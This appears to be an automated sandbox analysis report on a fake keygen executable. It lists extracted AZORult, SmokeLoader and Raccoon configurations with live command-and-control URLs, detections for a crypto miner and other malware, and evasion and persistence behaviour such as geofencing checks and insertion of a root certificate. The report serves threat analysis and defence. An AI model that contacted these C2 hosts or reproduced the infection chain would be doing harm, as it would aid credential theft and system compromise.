Analysis
-
max time kernel
20s -
max time network
605s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:55
Static task
static1
Behavioral task
behavioral1
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
General
-
Target
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
-
Size
5.2MB
-
MD5
9e12e3e503674039878cb7542a30f33c
-
SHA1
789b75006358e62cff26877e4fc5fdd31f7e8a76
-
SHA256
714b89115f9f4b3979e2f70ad6eb9e7d81fbcd8a8c984d7271adf01c8ecbcd36
-
SHA512
0091f4b40a06cadb0e12f1066dcb2c79a0ffa60bcc873761751e3f7feb85e30a38ba29cbbb29f3f32fa810236055044978533186942c07d0070e64b3e4dac544
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/5276-209-0x0000000002670000-0x0000000002F7A000-memory.dmp family_glupteba behavioral3/memory/5276-210-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/5276-211-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral3/memory/908-151-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/908-152-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/908-174-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/908-228-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/7372-747-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/7372-830-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/1832-832-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/1832-901-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 12 IoCs
pid Process 3700 keygen-pr.exe 816 keygen-step-1.exe 1300 keygen-step-3.exe 2012 keygen-step-4.exe 4064 key.exe 3480 Setup.exe 808 key.exe 2428 multitimer.exe 4056 setups.exe 1760 askinstall20.exe 3904 setups.tmp 4640 Conhost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 3904 setups.tmp 3904 setups.tmp 3904 setups.tmp 3904 setups.tmp 3904 setups.tmp 3904 setups.tmp 3904 setups.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 379 ipinfo.io 767 ipinfo.io 899 ipinfo.io 1122 ipinfo.io 138 ipinfo.io 140 ipinfo.io 231 ip-api.com 377 ipinfo.io 534 ip-api.com 1233 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4064 set thread context of 808 4064 key.exe 88 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 5048 5844 WerFault.exe 160 7528 5596 WerFault.exe 156 6184 5596 WerFault.exe 156 4976 5596 WerFault.exe 156 6516 5596 WerFault.exe 156 8276 5596 WerFault.exe 156 6520 5596 WerFault.exe 156 8324 5596 WerFault.exe 156 7208 5596 WerFault.exe 156 7148 5596 WerFault.exe 156 8680 5596 WerFault.exe 156 4628 5596 WerFault.exe 156 7308 5596 WerFault.exe 156 8440 5596 WerFault.exe 156 7508 5512 WerFault.exe 157 5592 5936 WerFault.exe 402 -
Delays execution with timeout.exe 10 IoCs
pid Process 6072 timeout.exe 10200 timeout.exe 8052 timeout.exe 5620 timeout.exe 4392 timeout.exe 7648 timeout.exe 7676 timeout.exe 8748 timeout.exe 8684 timeout.exe 9696 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 11 IoCs
pid Process 3096 taskkill.exe 7680 taskkill.exe 4368 taskkill.exe 6984 taskkill.exe 7772 taskkill.exe 10016 taskkill.exe 6684 taskkill.exe 1236 taskkill.exe 9036 taskkill.exe 6620 taskkill.exe 7604 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0412f8044a29d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{B8E9A32E-83C9-4C94-A25C-85AD8DECE05F} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000e5e3a1c215c77864bf99d93c2eaef6e23dcc10e8195ede227ae4d1c2569dd225cc8e6e585e663001b7dbd90ad7876251ce5f26c894434ceb50531f733bf11021c1b227b8a69a467bd95e521f67e8aaea5f0d6aaafc3dda9df836 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8f